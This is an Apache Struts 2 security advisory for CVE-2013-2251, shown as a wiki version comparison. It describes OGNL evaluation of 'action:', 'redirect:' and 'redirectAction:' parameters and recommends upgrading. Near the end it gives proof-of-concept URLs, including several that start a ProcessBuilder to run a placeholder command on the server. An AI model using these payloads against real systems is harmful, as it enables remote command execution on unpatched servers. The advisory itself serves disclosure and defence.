Versions Compared

Old Version 3

changes.mady.by.user René Gielen

Saved on

compared with

New Version Current

changes.mady.by.user Lukasz Lenart

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

Summary


Excerpt

A vulnerability introduced by manipulating parameters prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command execution


Who should read this

All Struts 2 developers and users

Impact of vulnerability

Remote command execution

Maximum security rating

Highly

Critical

Recommendation

Developers should immediately upgrade to Struts 2.3.15.1

Affected Software

Struts 2.0.0 - Struts 2.3.15

Reporter

Takeshi Terada of Mitsui Bussan Secure Directions, Inc.

CVE Identifier

CVE-2013-2251

Problem

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.

...

  1. Simple Expression - the parameter names are evaluated as OGNL.


    1. Code Block
      http://host/struts2-blank/example/X.action?action:%25{3*4}



    2. Code Block
      http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}


  1. Command Execution - the example method index 6 may vary on different JVMs


    1. Code Block
      http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}



    2. Code Block
      http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}



    3. Code Block
      http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}


...